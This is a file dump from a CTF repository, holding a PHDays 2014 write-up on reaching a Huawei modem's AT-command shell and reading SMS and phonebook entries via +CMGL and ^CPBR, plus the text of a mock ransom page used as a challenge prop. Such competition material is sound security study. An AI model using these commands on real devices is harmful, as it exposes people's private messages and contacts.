https://raw.githubusercontent.com/stypr/ctf/103a989482d5434f61202037ec398ea7d350d1c2/2014/0x3004_2014/web/xyz_template_success.png
--------------------------------------------------------------------------------
/2014/0x3004_2014/web/xyz_template_trace.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/stypr/ctf/103a989482d5434f61202037ec398ea7d350d1c2/2014/0x3004_2014/web/xyz_template_trace.png
--------------------------------------------------------------------------------
/2014/PHDays_2014/README.md:
--------------------------------------------------------------------------------
![scoreboard](scoreboard.png)

Participated as `Friend of Dalvik` (a part of wowhacker team)


## Snowden Gadget

By bruteforcing characters against the server, you will find out that there is an "AT" command on the shell.

Not only that, the hint on the given challenge was written as "Hayes".

By googling the hint, you find out that the challenge is related to a Huawei modem.
```
4.15 Message list command +CMGL
4.15.1 Command Syntax
Command Possible response(s)
+CMGL[=]
In case of pdu mode and successful execution of command:
[+CMGL:
,,[],
[+CMGL:,,[],
[...]]]OK
Otherwise:
+CMS ERROR:
+CMGL=? +CMGL: (list of supported s)
OK
[,]
[^CPBR:
,,,,[,][[...]
^CPBR:
,,,],[,]]
]OK
In case of MS-related error:
+CME ERROR:
^CPBR=?
^CPBR: (list of supported
s),[],[],[]
OK
In case of MS-related error:
+CME ERROR:
8.5.2 Description
This command returns the phonebook entries between positions index1 and index2 in
the currently selected phonebook memory. If no entry exists between index1 and
index2, the following will be returned:
+CME ERROR: not found
Alternatively, you can input index1 only, and only the phonebook entries in the position
index1 will be returned.
The TEST command returns the position range of the currently selected p
```

You will eventually get the flag by using the +CMGL and ^CPBR commands.
--------------------------------------------------------------------------------
/2014/PHDays_2014/backup/Minecraft_really_stereotyped!!.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/stypr/ctf/103a989482d5434f61202037ec398ea7d350d1c2/2014/PHDays_2014/backup/Minecraft_really_stereotyped!!.png
--------------------------------------------------------------------------------
/2014/PHDays_2014/backup/PHP_JL.php:
--------------------------------------------------------------------------------
(Only the visible text of this HTML page survived extraction; its PHP and markup are missing.)

You data was encrypted and stored in Detcelfer Data Prison
This is a prison for stolen data from victim's computers. Pay us 31,337 BTC to get back your data or we will delete it. You have only two days for it, so don't waste your time
Pay now »

Seriously
Don't try to cheat us. Don't forget who has the better case now!
Pay us »

Unbreakable
Our prison is the best prison in the world. There is no byte leaked from our prison
Pay us »

Our data center works for you
We build, maintain and operate our own data centers, and have a deep understanding of your infrastructure from the ground up. That means less finger pointing, more accountability and more reliability.
Pay us »

© Detcelfer PHDays 2013-2014